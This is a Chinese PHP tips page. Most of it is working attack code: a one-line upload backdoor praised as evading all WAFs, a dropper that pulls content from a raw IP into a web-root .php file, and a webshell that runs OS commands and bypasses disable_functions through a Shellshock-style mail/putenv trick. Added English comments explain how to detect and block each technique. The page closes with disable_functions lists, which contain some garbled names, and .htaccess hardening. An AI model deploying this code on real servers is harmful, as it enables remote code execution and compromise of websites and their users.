getservbyname php,php几个实用小技巧

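文件上传表单后门(原文称“比较不错,通杀所有 WAF”)。它把上传的临时文件直接作为 PHP 代码包含执行,因此检测不应只依赖 WAF:对站点源码扫描以 $_FILES[...]['tmp_name'] 为参数的 include/require 即可发现这类后门。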

// Backdoor pattern: the temporary path of the upload sent in the form field
// "only_pcd" is passed straight to include_once, so whatever the client
// uploads is parsed and run as PHP by the server.
// The leading @ suppresses the warning raised when no file was uploaded, so
// ordinary requests to the script leave no error output.
// Review/detection: an include/require whose argument is taken from $_FILES
// (or any other request data) has no legitimate use; search the code base for
// it and treat a hit as a compromise indicator.
@INCLUDE_ONCE($_FILES['only_pcd']['tmp_name']);

?>

保存之后

本地构建一个上传表单

你传什么

他就执行什么

php下载远程文件写入服务器

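/**
 * Fetch the body of an http:// or https:// URL with a GET request.
 *
 * cURL is used when the extension is loaded; otherwise the request goes
 * through the http stream wrapper, with one retry when the first attempt
 * returns nothing.
 *
 * The scheme is checked up front and both transports are limited to HTTP(S).
 * Without that check the stream fallback would pass file://, php:// and plain
 * filesystem paths to file_get_contents(), turning any caller-influenced $url
 * into a local-file read.
 *
 * USER_AGENT is a constant this function expects to be defined elsewhere; it
 * is not defined in the visible snippet.
 *
 * @param string $url Absolute http:// or https:// URL.
 * @return string|false Response body, or false when the URL is rejected or the
 *                      request fails.
 */
function Reads($url){
    // Allow-list the scheme before any I/O happens.
    $scheme = is_string($url) ? parse_url($url, PHP_URL_SCHEME) : null;
    if (!is_string($scheme) || !in_array(strtolower($scheme), array('http', 'https'), true)) {
        return false;
    }

    if (extension_loaded('curl')) {
        $handle = curl_init();
        curl_setopt_array($handle, array(
            CURLOPT_USERAGENT => USER_AGENT,
            CURLOPT_FOLLOWLOCATION => true,
            // Bound the redirect chain and keep every hop on HTTP(S).
            CURLOPT_MAXREDIRS => 5,
            CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_HEADER => false,
            CURLOPT_HTTPGET => true,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 30,
            CURLOPT_URL => $url
        ));
        // curl_exec() returns false on failure; that value is passed to the caller unchanged.
        $html = curl_exec($handle);
        curl_close($handle);
        return $html;
    }

    $opts = array('http' => array('method' => "GET", 'timeout' => 8));
    $context = stream_context_create($opts);
    $html = file_get_contents($url, false, $context);
    if (empty($html)) {
        // Single retry for an empty or failed first response.
        $html = file_get_contents($url, false, $context);
    }
    return $html;
}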

// Dropper pattern: content is fetched over plain HTTP from a bare IP address
// and written, unchecked, into a .php file under the web root, where the web
// server will execute it on the next request.
// Defensive notes: the PHP process needs write access to the document root for
// this to work, and it makes an outbound HTTP request; a non-writable docroot,
// egress filtering for the web server account, and file-integrity monitoring
// for new or changed .php files each break or expose this step.
$c=Reads('http://11.11.222.111/cc.txt');

// Mode "w" creates or truncates the target. The @ hides a failed open; $fp is
// then false and the fwrite()/fclose() calls below run on a non-resource.
$fp = @fopen('D:/wwwroot/xxx.com/xxx/link.php',"w");

fwrite($fp,$c);

fclose($fp);

?>

php命令执行脚本代码,多个安全函数执行

/**
 * Run an operating-system command and return its output as a string.
 *
 * The function walks an if/elseif chain of process-spawning primitives and
 * uses the first one that is available, so disabling only some of them in
 * php.ini does not stop it. Nearly every call is prefixed with @, which keeps
 * failures out of the page output.
 *
 * Defensive reading: the chain is a checklist of what has to be closed off
 * together - exec, shell_exec, system, passthru, popen, proc_open, the COM
 * class on Windows, and the mail()/putenv() pair. COM is a class, so an entry
 * in disable_functions does not cover it.
 *
 * @param string $cmd Command line handed unmodified to the chosen primitive.
 * @return string Command output, or a status message from the last branch.
 */
function Exec_Run($cmd)

{

$res = '';

// exec() fills $res with an array of output lines, joined here with CRLF.
if(function_exists('exec')){@exec($cmd,$res);$res = join("\r\n",$res);}

elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}

// system() and passthru() write directly to output, so it is captured with an output buffer.
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}

elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}

// popen() is attempted directly (no function_exists check); the pipe is read in 1024-byte chunks.
elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}

// Taken when the script path does not start with "/" (presumably a Windows host - confirm)
// and the COM class exists: the command runs through a WScript.shell COM object.
elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}

// proc_open() with stdout and stderr pipes. $aliases is not defined in this function, so the
// isset() test is false here. This is the only branch that HTML-escapes the output it returns.
elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}

// Last resort, used only when /bin/sh is a link to bash: putenv() sets an environment variable
// shaped like a bash function definition, mail() is called with extra parameters, and the output
// is read back from a temp file created in the current directory. This looks like the
// "Shellshock" class of bash flaw - a patched bash, or disabling putenv and mail where they are
// not needed, removes the branch.
elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}

return $res;

}

// Prints the output of `whoami`, i.e. the account the PHP process runs as.
// That account's privileges bound what any command run through Exec_Run can do,
// which is why the web server should run as a dedicated low-privilege user.
echo Exec_Run('whoami');

php.ini 安全函数禁用

disable_functions =exec,passthru,popen,proc_open,shell_exec,system,assert,chroot,getcwd,scandir

Disabled functions: COM,opendir,get_cfg_var,eval,phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,dll,popen,disk_free_space,checkdnsrr,checkdnsrr,getservbyname,getservbyport,disk_total_space,posix_ctermid,posix_get_last_error,posix_getcwd, posix_getegid,posix_geteuid,posix_getgid, posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid, posix_getppid,posix_getpwnam,posix_getpwuid, posix_getrlimit, posix_getsid,posix_getuid,posix_isatty, posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid, posix_setpgid,posix_setsid,posix_setuid,posix_strerror,posix_times,posix_ttyname,posix_uname,getcwd,assert

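精简一些的列表(禁用后几乎什么命令都执行不了,管理员可以根据需求自行修改)。注意:disable_functions 只对函数生效——eval 是语言结构,COM 是类,写进该列表不起作用;另外上下两份列表中的 popepassthru、dll、chble_functionsown 看起来是笔误或转载时产生的乱码,不是有效的函数名,使用前应逐项核对。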

mail,eval,assert,phpinfo,passthru,exec,system,shell_exec,proc_open,popen,dl,pcntl_exec,putenv,touch,chble_functionsown,chmod,chroot,get_cfg_var,ini_alter,ini_restore,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,escapeshellcmd,socket_create,unlink,chown,touch,ini_set,opendir,readdir,scandir,dir,pipe,win_shell_execute,win32_create_service

禁止当前目录执行脚本

.htaccess

# Apache 2.2 access-control syntax. Together these two directives refuse every
# HTTP request to the directory, which is broader than only blocking script
# execution. On Apache 2.4 they depend on mod_access_compat; the native
# equivalent there is "Require all denied".
Order allow,deny

Deny from all

.htaccess 如果不能执行PHP就在这里面加

# Serve .shtml files as HTML and have the server parse them for server-side
# includes (SSI).
AddType text/html .shtml

AddHandler server-parsed .shtml

# index.shtml is tried first when a directory is requested.
DirectoryIndex index.shtml index.html index.htm index.php

# IncludesNoExec allows SSI but not its exec directive; -ExecCGI turns CGI
# execution off for this directory.
# NOTE(review): these directives only take effect where AllowOverride permits
# them. Setting "AllowOverride None" on directories that accept uploads keeps a
# dropped .htaccess from adding handlers like the ones above.
Options +IncludesNoExec -ExecCGI
